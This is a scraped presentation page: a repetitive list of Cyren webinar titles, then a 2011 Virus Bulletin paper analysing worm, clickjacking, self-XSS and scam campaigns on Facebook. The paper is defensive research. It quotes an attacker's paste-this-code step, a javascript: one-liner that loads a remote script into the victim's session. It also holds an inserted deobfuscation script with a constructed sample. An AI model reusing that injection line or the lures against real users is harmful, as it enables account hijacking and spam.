Webinar: Dispelling the Myths about Cloud SecurityWebinar: Dispelling the Myths about Cloud Security
Webinar: Dispelling the Myths about Cloud SecurityCyren, Inc
 
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats Report
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats ReportWebinar: Insights from CYREN's 2015 Q2 Cyber Threats Report
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats ReportCyren, Inc
 
Webinar: CYREN WebSecurity for Healthcare
Webinar: CYREN WebSecurity for HealthcareWebinar: CYREN WebSecurity for Healthcare
Webinar: CYREN WebSecurity for HealthcareCyren, Inc
 
CeBIT 2015 Presentation
CeBIT 2015 PresentationCeBIT 2015 Presentation
CeBIT 2015 PresentationCyren, Inc
 
Webinar: Insights from CYREN's 2015 Cyber Threats Yearbook
Webinar: Insights from CYREN's 2015 Cyber Threats YearbookWebinar: Insights from CYREN's 2015 Cyber Threats Yearbook
Webinar: Insights from CYREN's 2015 Cyber Threats YearbookCyren, Inc
 
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...Cyren, Inc
 
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...Cyren, Inc
 
CYREN Investor Presentation - January, 2015
CYREN Investor Presentation - January, 2015CYREN Investor Presentation - January, 2015
CYREN Investor Presentation - January, 2015Cyren, Inc
 
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?Webinar: Is There A Blind Spot In Your Cyberthreat Vision?
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?Cyren, Inc
 
Webinar: Insights from CYREN's Q3 trend report
Webinar: Insights from CYREN's Q3 trend reportWebinar: Insights from CYREN's Q3 trend report
Webinar: Insights from CYREN's Q3 trend reportCyren, Inc
 
Dual Detection Engines - Using Layered Security to Battle Cybercrime
Dual Detection Engines - Using Layered Security to Battle CybercrimeDual Detection Engines - Using Layered Security to Battle Cybercrime
Dual Detection Engines - Using Layered Security to Battle CybercrimeCyren, Inc
 
How to Launch a Web Security Service in an Hour
How to Launch a Web Security Service in an HourHow to Launch a Web Security Service in an Hour
How to Launch a Web Security Service in an HourCyren, Inc
 
Insights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportInsights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportCyren, Inc
 
Don't Risk the Blacklist - Stop Outbound Spam
Don't Risk the Blacklist - Stop Outbound SpamDon't Risk the Blacklist - Stop Outbound Spam
Don't Risk the Blacklist - Stop Outbound SpamCyren, Inc
 
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOUR
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOURHOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOUR
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOURCyren, Inc
 
Commtouch outbound-anti spam-webinar-201312-final
Commtouch outbound-anti spam-webinar-201312-finalCommtouch outbound-anti spam-webinar-201312-final
Commtouch outbound-anti spam-webinar-201312-finalCyren, Inc
 

Plus de Cyren, Inc (20)

Webinar: Why evasive zero day attacks are killing traditional sandboxing
Webinar: Why evasive zero day attacks are killing traditional sandboxingWebinar: Why evasive zero day attacks are killing traditional sandboxing
Webinar: Why evasive zero day attacks are killing traditional sandboxing
 
Webinar: Botnets - The clone army of cybercrime
Webinar: Botnets - The clone army of cybercrimeWebinar: Botnets - The clone army of cybercrime
Webinar: Botnets - The clone army of cybercrime
 
Webinar: Cloud-Based Web Security as First/Last Line of Defense
Webinar: Cloud-Based Web Security as First/Last Line of DefenseWebinar: Cloud-Based Web Security as First/Last Line of Defense
Webinar: Cloud-Based Web Security as First/Last Line of Defense
 
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat Report
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat ReportWebinar: Insights from CYREN's 2015-Q3 Cyber Threat Report
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat Report
 
Webinar: Dispelling the Myths about Cloud Security
Webinar: Dispelling the Myths about Cloud SecurityWebinar: Dispelling the Myths about Cloud Security
Webinar: Dispelling the Myths about Cloud Security
 
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats Report
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats ReportWebinar: Insights from CYREN's 2015 Q2 Cyber Threats Report
Webinar: Insights from CYREN's 2015 Q2 Cyber Threats Report
 
Webinar: CYREN WebSecurity for Healthcare
Webinar: CYREN WebSecurity for HealthcareWebinar: CYREN WebSecurity for Healthcare
Webinar: CYREN WebSecurity for Healthcare
 
CeBIT 2015 Presentation
CeBIT 2015 PresentationCeBIT 2015 Presentation
CeBIT 2015 Presentation
 
Webinar: Insights from CYREN's 2015 Cyber Threats Yearbook
Webinar: Insights from CYREN's 2015 Cyber Threats YearbookWebinar: Insights from CYREN's 2015 Cyber Threats Yearbook
Webinar: Insights from CYREN's 2015 Cyber Threats Yearbook
 
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...
Webinar: That's the Way the Network Perimeter Crumbles - Cybersecurity for th...
 
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...
Webinar: Can a Light Bulb Really Pose a Security Threat? A Practical Look at ...
 
CYREN Investor Presentation - January, 2015
CYREN Investor Presentation - January, 2015CYREN Investor Presentation - January, 2015
CYREN Investor Presentation - January, 2015
 
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?Webinar: Is There A Blind Spot In Your Cyberthreat Vision?
Webinar: Is There A Blind Spot In Your Cyberthreat Vision?
 
Webinar: Insights from CYREN's Q3 trend report
Webinar: Insights from CYREN's Q3 trend reportWebinar: Insights from CYREN's Q3 trend report
Webinar: Insights from CYREN's Q3 trend report
 
Dual Detection Engines - Using Layered Security to Battle Cybercrime
Dual Detection Engines - Using Layered Security to Battle CybercrimeDual Detection Engines - Using Layered Security to Battle Cybercrime
Dual Detection Engines - Using Layered Security to Battle Cybercrime
 
How to Launch a Web Security Service in an Hour
How to Launch a Web Security Service in an HourHow to Launch a Web Security Service in an Hour
How to Launch a Web Security Service in an Hour
 
Insights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend ReportInsights from CYREN's Q2 2014 Internet Threats Trend Report
Insights from CYREN's Q2 2014 Internet Threats Trend Report
 
Don't Risk the Blacklist - Stop Outbound Spam
Don't Risk the Blacklist - Stop Outbound SpamDon't Risk the Blacklist - Stop Outbound Spam
Don't Risk the Blacklist - Stop Outbound Spam
 
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOUR
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOURHOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOUR
HOW TO LAUNCH WEB SECURITY IN THE CLOUD - IN AN HOUR
 
Commtouch outbound-anti spam-webinar-201312-final
Commtouch outbound-anti spam-webinar-201312-finalCommtouch outbound-anti spam-webinar-201312-final
Commtouch outbound-anti spam-webinar-201312-final
 

Dernier

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 

Dernier (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 

Facebook Attacks - an in-depth analysis

  • 1. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK Maria Patricia M. Revilla Commtouch, Philippines October 2011 Copyright is held by Virus Bulletin Ltd, but made available on this site for personal use free of charge by permission of Virus Bulletin (http://www.virusbtn.com).
  • 2. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK
    Maria Patricia M. Revilla
    Commtouch, Philippines
    Email Patriciar@commtouch.com

    ABSTRACT

    Social networking sites have, beyond doubt, made it into today’s popular culture. They have apparently become the primary resource for the masses when it comes to socializing for the sole reason that they generally measure up to what the modern populace claim to demand – something fast, easy and accessible. Facebook is a perfect example.

    Facebook has become undeniably popular. With 600 million users to date, it could be considered to be the most widely used social networking site in the last decade. People patronize Facebook for its simple, but rather functional features, which range from public messaging through wall posts and private messaging, to sharing photos, videos and URL links, to gaming, and even marketing and advertisements. It even makes a good online outlet for thoughts in the form of ‘status updates’ which can be changed as often as one wishes.

    With its popularity and effectiveness, Facebook has also become a hot spot for attackers. Over the years, social engineering has been reported to effectively spread malicious programs which are hard to prevent, especially granted that they are designed to trick human thinking.

    This paper will seek to study the social engineering attacks that have been identified to spread malware through Facebook. By tracking down the distribution methods/mechanisms for spreading malware, and the current preventive and defensive measures, this paper aims to give an insight into the challenges that are being faced in terms of protecting users.

    INTRODUCTION

    Facebook has become enormously popular, reaching over 600 million users to date [1]. Users have increasingly integrated social networks into their lives, spending a reported 700 billion minutes per month on Facebook [2]. Every 20 minutes approximately 24,857,000 actions are performed which may be broken down into:

    10,208,000  comments made
     2,716,000  photos uploaded
     2,716,000  messages sent
     1,972,000  friend requests accepted
     1,851,000  status updates
     1,587,000  wall posts
     1,484,000  event invites
     1,323,000  tagged photos
     1,000,000  links shared

    Table 1: Facebook activity statistics onlineschools.org [3].

    The popularity, number of subscribers, and level of activity have made Facebook an attractive tool for attackers who use social engineering in order to spread malicious content or earn money unethically. Over the years, social engineering has been enormously effective as it succeeds in convincing users to unknowingly act in the interests of cybercriminals. Spam and email scams have been used to deceive users, for example, offering seemingly legitimate employment, while putting victims to work as money mules who unwittingly help launder stolen funds. It has also been used as a tool to start and force the spread of worms by including attachments disguised as normal documents.

    The use of fake file icons such as those used for Windows folders, Word documents, text files, media files and others are a subtle form of social engineering, letting users think that a malicious application is just a normal document. Instant messages on Yahoo! or MSN use convincing phrases promising must-see pictures or videos to trick users into clicking malicious links that may point to phishing sites or rogue software. Rogue software or fake anti-virus products are themselves a form of social engineering. By scaring users with ‘detected’ malware, they convince them to pay for products that they believe will actually help them remove the ‘infection’. Sophisticated social engineering attacks use emotion and human desires to trick users. Protecting users from themselves is a tough job and it is something that a computer cannot really do.

    In 2008, the Koobface worm spread through social networks, including Facebook (where its name came from). It may be considered to be one of the most successful worms as new variants are still being encountered – over 20,000 variants [4] by April 2011. Aside from the Koobface worm, there have been other forms of attacks – clickjacking, phishing, spams, scam messages, links to rogue applications, and others that help cybercriminals earn money. It is certainly alarming to see how these forms of attack have increased.

    Based on the number of active users and activities performed by Facebook users, it is clear that Facebook has become an effective social networking site with people benefiting from its integrated functionality such as photos and messaging. At the same time, attackers have successfully taken advantage of this functionality to turn Facebook into a channel for spreading malicious content. Even a small percentage of compromised users would equal a large attack base given the number of active users on the site.

    Security companies have developed tools and have improved scanners to detect and prevent intrusion of malicious programs. Solutions range from single file detection to generic and heuristic detections, and even cloud-based technologies. As these protection technologies have improved, attacks have grown more sophisticated in an attempt to evade new and existing security measures. Attackers usually take advantage of commonly used software and/or popular sites combining social engineering with exploits of vulnerabilities in programs like Adobe Reader or Internet Explorer. Our observation is that attackers have achieved the most success in bypassing security measures by employing sophisticated social engineering methods.

    This paper will focus on analysing social engineering attacks on Facebook and will try to present the preventive measures the industry has provided to users, defensive measures/tools that are available for users, and the challenges faced in preventing users from becoming victims.

    VIRUS BULLETIN CONFERENCE OCTOBER 2011
  • 3. THE PROBLEM – FACEBOOK SOCIAL ENGINEERING ATTACKS

    A trusting user in a social network environment wouldn’t suspect that a friend (deliberately added to a friend list) would send any harmful content. This trust turns a very popular and widely used social networking site like Facebook into a huge opportunity for attackers. Users are drawn to action by ‘friends’ – following a message, links, or an invite – without suspecting that this will undermine security.

    Worms: Koobface and Palevo

    The Koobface worm has been around since 2008 [5]. It was first encountered through Facebook messages that enticed a user to view a video from a link that looked as though it came from YouTube. Alluring messages like, ‘You must see it!!!...’, were the first step of its social engineering tactic. Users who clicked on the link were prompted to download newer versions of Adobe Flash Player – the second part of the social engineering attack. The downloaded file ‘codecsetup.exe’ was actually not an Adobe Flash Player, but a malicious executable. Once the executable is installed, the infected machine turned into a bot used for spreading more messages with malicious links and for other malicious purposes.

    Later, when users became aware of a worm that spread using a fake YouTube-like video, a new variant was encountered which used a Blogspot link sent through messages of friends [6]. The message had the same video-related theme, but the changed destination to a Blogspot link reduced the suspicion. The Blogspot pages included JavaScript redirects to pages again requiring the installation of a so-called video playing component (as with the initial version). As before, the ‘video playing component’ was in fact a malicious executable. In this case, the infected machine opened new Blogspot accounts and distributed the malicious links to friends. Figures 1 and 2 show some examples.

    Figure 1: Blogspot post example (1).

    Figure 2: Blogspot post example (2).

    Palevo is another worm that has been known to spread through social network chat messages or instant messages including Facebook [7]. This worm has exploited Facebook chat and Facebook application functionality. It tried to spread by sending chat messages to friends and disguised itself as a photo album application. Following the link to the fake application, the user was prompted to download the file ‘FacebookPhotos#####.exe’, which is the malicious executable. Newer variants used different filenames such as ‘Facebook-pic[number].exe’ (e.g. Facebook-pic000751357.exe) [8].

    Clickjacking

    Another type of social engineering attack is clickjacking. This method tricks a user into allowing a malicious script or a code to execute without his knowledge by enticing the user to click on seemingly normal objects on a web page, such as buttons, links, or images. On the Facebook platform, attackers were able to find ways to exploit some of its functionalities such as the ‘Like’, ‘Publish’, and ‘Comments’ buttons when writing comments on photos, videos or links.

    A worm that spread on Facebook through a clickjack attack was successfully executed using an invisible IFrame. It basically exploited the ‘Publish’ button that posts a link to the user’s wall. The link points to a page that contains an invisible IFrame shown in the code in Figure 3 (from jsunpack.jeek.org). The user is unaware that a click anywhere on the page is actually a click on the ‘Publish’ button. This results in a post on the victim’s wall, which will then be seen by the victim’s friends, probably causing them to click as well, and in this way continuing the spread of the malware. This worm was first reported by F-Secure in May 2010 [9].

    Following this attack, a lot of other clickjack attacks followed by exploiting the famous ‘Like’ button, also known as a ‘likejacking’ attack. When a user ‘likes’ a certain page, video, photo or a website on Facebook, it enables the user to share this content with friends. It’s almost the same as suggesting it to friends as the liked page appears on the user’s newsfeed causing friends to see it and probably to click it themselves. This attack works especially well when the link has a descriptive text specially crafted to attract users, such as messages promising a ‘video of Justin Bieber’, or ‘pics of Miley Cyrus’, or any current newsworthy event [10]. An example of the actual code used for this attack is shown in Figure 4 (from pastebin.com). The code basically uses the same method as an invisible IFrame which follows the user’s mouse. Any click on the page will be a click on the ‘Like’ button, without the user’s knowledge.

    Another attack exploited the ‘Comment’ functionality. Once a user ‘comments’ on a photo, a video or a link on Facebook, it will appear on the user’s wall or newsfeed, causing friends to see it and, as before, probably attracting them to see and click on it as well. Here again, the messages included text with famous names such as Justin Bieber. Clicking on the link led to a page with a question and text entry box for the answer. The text box was actually a Facebook comment box which would result in the posting of a comment on the victim’s wall, or a message on the victim’s newsfeed, causing it to be shared and seen by the user’s friends. This attack was reported by Sophos in April 2011 [11].

    Scam and spam messages on Facebook

    Facebook has also become the target of scammers and spammers. Unethical and illegal advertisers have predictably
taken advantage of the large number of Facebook users.

Figure 3: Clickjack sample using IFrame tag (1).

Figure 4: Clickjack sample using IFrame tag (2).

One method of scam and spam has spread on Facebook through a manual cross-site scripting (XSS) attack (also called a self-XSS attack). The concept of an XSS attack is not new, but the interesting thing here is the social engineering used that convinces the user to manually enter the malicious script in the browser address bar. The topics were varied [12, 13]:

• Promises of 500 free Facebook credits (something that does not exist)
• An application to see who had been viewing a user profile
• Video of Osama Bin Laden’s assassination.

These all led to pages with instructions such as these:

    Just follow these 3 steps:
    1. Copy this code (highlight and press CTRL-C):
    javascript:(a=(b=document).createElement(‘script’)).src=’//[omitted]/f.js’,b.body.appendChild(a);void(0)
    2. Delete the actual address from the url field in your browser and paste the code instead.
    3. Press Enter and wait for a bit, it can take up to a minute to complete.
    That’s it!
    If you are having trouble with these instructions, try viewing the instructions here: http://[omitted].info/?sg2lq it’s where I learned it

Attackers even provided step by step image guides showing how to perform the self-XSS attack, as shown in Figures 5 and 6.

Figure 5: Self-XSS instruction to users (1).

Figure 6: Self-XSS instruction to users (2).

It is quite remarkable that there are users who fall for scams which require them to manually copy and paste code into their browser’s address bar. Once the code has been pasted as per the instructions, the user is redirected to a ‘survey page’. This is an affiliate link where rogue affiliates earn money for bringing users to partner sites. At the end of the survey page, a user ends up viewing ads that are not really related to the subject of the link that they originally clicked. Most of these focus on methods to earn easy money, earn points/credits, view gossip or the latest news and events, and others.

Having hijacked the user’s Facebook session, the script also sends the scam messages through almost all means of reaching out to a victim’s friends including: chat, wall posts, status updates, event invitations and private messages. It also makes use of shortened URLs in order to avoid immediate suspicion from users.

Figure 7 shows an example of a fake event invitation. Notice that the subject is ‘Official App: See Who has Viewed your Profile? Find out here! [bad shortened link]’. Many users will notice that this doesn’t really sound like an ‘event’, but the idea is to catch the user’s attention and draw them into following the link.

An example of spam code shown in Figure 8 illustrates how the messages continue to spread widely. The code uses an obfuscation technique to hide the routine using encoded function calls stored in an array of variables – in this sample,
var _0xb65. Looking at the rest of the code gives us a clue as to its real purpose since it uses the XMLHttpRequest API, which is used for sending HTTP or HTTPS requests directly to a web server. Decoding the variable _0xb65 reveals what the routine is all about (Figure 9). Basically, once the script is executed, messages will be sent to the victim’s friends with texts based on the variable settings in the code as shown in the additional code below. Aside from posting a message the script will also make a comment on the posted message and will also ‘like’ the post it created (Figure 10). Figure 11 shows how the resulting post, comment and message will look.

Figure 7: Fake Facebook event invitation.

Figure 8: JavaScript spam code (1).

Figure 9: JavaScript spam code (2).

Figure 10: JavaScript spam code (3).
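The decoding step described above, recovering the strings hidden in an array such as _0xb65, can be done statically so that the suspect script is never executed. The following is an added example, not code from the paper or from the figures: the obfuscated SAMPLE is constructed for illustration, and the function names (decodeLiteral, extractTables, deobfuscate, triage) and the "/placeholder" path are assumptions.

```javascript
// Added example: decode a "_0x" string-array obfuscation statically, without
// ever evaluating the suspect script. SAMPLE is constructed for illustration
// (it is not the code in Figure 8) and "/placeholder" is a dummy path.
const SAMPLE = String.raw`var _0xb65=["\x6F\x70\x65\x6E","\x50\x4F\x53\x54","\x73\x65\x6E\x64","\x6D\x65\x73\x73\x61\x67\x65\x3D"];
var r=new XMLHttpRequest();r[_0xb65[0]](_0xb65[1],"/placeholder",true);r[_0xb65[2]](_0xb65[3]+text);`;

// `var _0xNAME = ["...", '...']`: group 1 is the name, group 2 the array body.
const TABLE = /(?:var|let|const)\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[\s,])*)\]/g;
const STRING = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g; // one string literal
const LOOKUP = /(_0x[0-9a-fA-F]+)\[(\d+)\]/g;              // _0xNAME[3]

// Decode the escape sequences of a string literal body (no eval involved).
function decodeLiteral(body) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', 0: '\0' };
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (m, x, u, ch) => {
      if (x || u) return String.fromCharCode(parseInt(x || u, 16));
      return ch in simple ? simple[ch] : ch; // \" \' \\ and other escapes
    });
}

// Collect every string table: Map of table name -> decoded entries.
function extractTables(src) {
  const tables = new Map();
  for (const m of src.matchAll(TABLE)) {
    const entries = [...m[2].matchAll(STRING)]
      .map(s => decodeLiteral(s[1] !== undefined ? s[1] : s[2]));
    tables.set(m[1], entries);
  }
  return tables;
}

// Inline each table lookup so the hidden call sequence becomes readable.
function deobfuscate(src) {
  const tables = extractTables(src);
  const readable = src.replace(LOOKUP, (m, name, idx) => {
    const entries = tables.get(name);
    const i = Number(idx);
    return entries && i < entries.length ? JSON.stringify(entries[i]) : m;
  });
  return { tables, readable };
}

// Triage summary for an analyst: decoded strings, network API use, methods called.
function triage(src) {
  const { tables, readable } = deobfuscate(src);
  return {
    strings: [...tables.values()].flat(),
    usesXhr: /\bXMLHttpRequest\b/.test(readable),
    methods: [...readable.matchAll(/\[\s*"([A-Za-z_$][\w$]*)"\s*\]\s*\(/g)].map(m => m[1]),
    readable,
  };
}

console.log(triage(SAMPLE));
```

The table pattern assumes the array holds only string literals, which is the layout the paper describes; a table built at run time would need a different approach.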
Figure 11: Resulting post made by the spam code.

Money-mule and credit card scams

Money-mule scams have also made their way into Facebook. As with other platforms, scammers attract people with promises of easy money. Money-mule recruitment usually starts with Facebook groups (which can be started by any Facebook user). These groups often attract large followings because people do not know what they are getting into [14].

Other frauds have also appeared, such as credit card scams. These start with messages designed to attract users by proposing ‘money-making jobs’, or books about ‘how to earn big money’, ‘how to win the Lotto’, or ‘guides on how to be attractive’. The example in Figures 12 and 13 shows the first part of such an attack using an ‘easy money making’ Facebook group. Some of the posts on the group’s wall are products being sold, relating to books for winning the Lotto or attracting women (Figures 14 and 15).

Figure 12: Scam group page sample (1).

Figure 13: Scam group page sample (2).

Figure 14: Scam post sample (1).

Figure 15: Scam post sample (2).

Following the links leads to the sites shown in Figures 16 and 17, enticing users by promising results as well as a discount when they buy the product.

Figure 16: Scam post advertisement sample (1).

Figure 17: Scam post advertisement sample (2).

Once a user accepts the offer, the payment is made via a credit card transaction as shown in Figures 18 and 19.

Figure 18: Payment scam sample (1).

Figure 19: Payment scam sample (2).
The site ‘complaintsboard.com’ shows that the site seems to be a fraud or a scam (Figure 20).

Figure 20: Complaintsboard complaint comments.

Fake email notifications – more scam, spam and malware attachments

Spammers promoting pharmaceutical products have also used Facebook as an opportunity. Fake Facebook email notifications trick users into clicking links leading to online pharmacy sites [15]. An example of a fake email notification is shown in Figure 21.

Figure 21: Fake Facebook email notification leading to online pharmacy site.

Following the link leads to the pharmaceutical store page shown in Figure 22.

